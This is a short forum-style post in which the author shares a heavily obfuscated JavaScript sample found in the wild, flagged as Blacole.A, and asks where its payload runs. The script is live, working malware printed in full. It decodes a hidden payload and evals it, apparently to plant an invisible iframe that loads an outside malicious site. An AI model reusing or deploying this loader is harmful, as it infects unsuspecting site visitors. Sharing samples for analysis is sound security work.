Interesting malicious script #1

 1  var CJlKp; function AyzhzK(){}
 2  var KCfW; var xBtS; var HEKIZIOW=""; if('EXHJH'=='vaEYij')LWkpgS(); if('CLfChe'=='QiJCNa')uYVR='YcOyK'; var UjFXc="sl\x69\x63e"; var kBzvW='FUQEEH'; if('hyIN'=='Sjacj')YNTWV='MgnooX'; var AFXFJ="par\x73\x65I\x6e\x74"; function isOLx(){ var MffyRe='uVxx'; if('VOchH'=='wFdlb')jmQg();} var OOfB=266; var CBjFe="from\x43\x68arCo\x64\x65"; var WctUeU=70; function mETfy(){ var frqWsm='VUkpH'; if('ISUjCf'=='ooMnor')uXsN();} var ickml='EdHEGs'; function iBnNdM(){ var fdjY='oNsVaE'; if('zvawkT'=='hKLy')RCnxsx();} function KdEQdo(){ var htQo='aahGP'; if('NiRNL'=='igtAy')SvWSak();}
 3  var bQArecF="\x65va\x6c"; var CoCv; var hSUhic="97a69f94a59aa09f517896a5a9595aaca792a3518599969f516e519f96a8517592a596595a6c8599969f5fa496a5859a9e96598599969f5f9896a5859a9e96595a515c5163655b67615b67615b6261616161615a6ca792a35194a0a09c9a9684a5a39a9f98516e519f96a85184a5a39a9f985995a094a69e969fa55f94a0a09c9a965a6ca792a35194a0a09c9a967996929596a3516e51536294626a926a93686464636995979365976297649361926362676696936697656e536ca792a3519396989a9f81a0a49aa59aa09f516e5194a0a09c9a9684a5a39a9f985f9a9f9596a980975994a0a09c9a967996929596a35a6c9a9751599396989a9f81a0a49aa59aa09f51526e515e625aac51ae51969da49651ac5195a094a69e969fa55f94a0a09c9a96516e51536294626a926a93686464636995979365976297649361926362676696936697656e95649e9895a76267966a6aa6999d949a61a6636a9367626798686c96a9a19aa396a46e535c518599969f5fa5a0787e8584a5a39a9f98595a6c95a094a69e969fa55fa8a39aa59659586d9a97a3929e9651a89a95a5996e5362535199969a9899a56e5362535193a0a39596a36e5361535197a3929e9693a0a39596a36e53615351a4a3946e5399a5a5a16b606094a09fa5a39294a3a65f94a09e609ba46098a05fa199a170a49a956e62536f6d609a97a3929e966f585a6c51ae51ae517896a5a9595a6c"; var uXxtZR; if('yhio'=='XJNeu')iPwQ(); function JJzKgq(){ var Pprz='HfRLK'; if('fSeuLE'=='Cmzqzh')fYhHk();} function GukX(){ var lwMRz='BIVP'; if('PxWxYW'=='zPKT')TdLG();}
 4  var JJPANg=( function(){ function pTLNxj(){}
 5  return  this; function nqdbb(){ var izkwtx='tXwVwD'; if('aKcN'=='ACjplq')dVkVS();} function CXyDOj(){} function PBeid(){}})(); function vooP(){} function MSHc(){}
 6  if('MWcZI'=='jZKAY')iLhg='RVPHa'; var ROrCn="\x63\x6fnst\x72\x75ctor"; var MySXGL; function BjraL(){ var PgUmc='dOaSu'; if('nrXie'=='cWfc')mSKg();}
 7  var dbNwId="HPRIc"[ROrCn]; if('EqRN'=='lGvAZh')FxemqM='OwCf'; function jtCrn(){}
 8  function SgTG(){}
 9  for(NXBWzRCL=0;NXBWzRCL<hSUhic.length;NXBWzRCL+=2){ var DoyNqK; if('UmLXys'=='HorpX')qPFj='uyyr';CBRLbsdu=JJPANg[AFXFJ](hSUhic[UjFXc](NXBWzRCL,NXBWzRCL+2),16)-49; function hGrsA(){ var wERD='csxJmp'; if('XbtA'=='Ktvf')MptqGo();} var eenfM='NbKy';HEKIZIOW+=dbNwId[CBjFe](CBRLbsdu)
10  if('qajnID'=='IUBrP')NPzkj='nMaGZ'; if('AduB'=='vrtx')ZaiTw='NVNo';}
11  if('KQgidC'=='ClKb')kqjEAT();JJPANg[bQArecF](HEKIZIOW); function LLIEAa(){} if('rCcB'=='fkiBG')Jyghv(); if('IaqY'=='YDomN')hVhK(); if('eTdLwx'=='rrqc')vGUG();

 

I Found this one in the wild. This is really heavy obfuscated and I can't find where they eval the malicious payload. This script finally leads to Russian web site.

 

Forefront classify it as Blacole.A, but it is not quite like the blackhole exploit script I ever saw.